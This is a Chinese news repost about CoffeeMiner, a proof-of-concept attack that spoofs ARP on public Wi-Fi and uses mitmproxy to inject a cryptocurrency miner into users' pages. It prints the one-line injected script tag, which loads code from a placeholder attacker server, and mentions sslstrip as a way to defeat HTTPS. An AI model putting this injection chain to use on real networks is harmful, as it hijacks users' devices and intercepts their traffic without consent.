新型CoffeeMiner攻击:劫持公共Wi-Fi设备秘密挖掘门罗币

2018-06-11    来源:

容器云强势上线!快速搭建集群,上万Linux镜像随意使用

      据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。

      加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前,黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本,将其变成了自己的矿机疯狂挖掘门罗币(与比特币类似的一种加密货币)。 Arnau 专家受到了星巴克案件的启发,破解公共 Wi-Fi 网络,将加密挖掘代码注入到连接的浏览会话中,迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。

Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ,这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。

coffeeminer-network-attack

      Arnau 专家分享 CoffeeMiner 攻击方式:

通过欺骗局域网上的地址解析协议(ARP)消息拦截网络上其他设备的未加密传输。

使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁,开发人员只注入了一行调用加密货币矿工的代码。

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>

然后,通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时,运行 JavaScript 滥用 CPU 时间,并使用 CoinHive 加密挖掘软件挖掘 Monero 。

一旦编译完成,这些元素就会成为一个单独的脚本,可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由,导致其设备在浏览时挖掘加密货币。

      目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS,但是可以通过添加 sslstrip 来绕过限制。

消息来源:Security AffairsZdnet

转自 HackerNews.cc 

标签: https ssl 代码 服务器 脚本 网络 用户

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点!
本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。

上一篇:Intel被爆漏洞:华为云宣布紧急升级

下一篇:各大科技公司对这次的大规模芯片漏洞问题的回应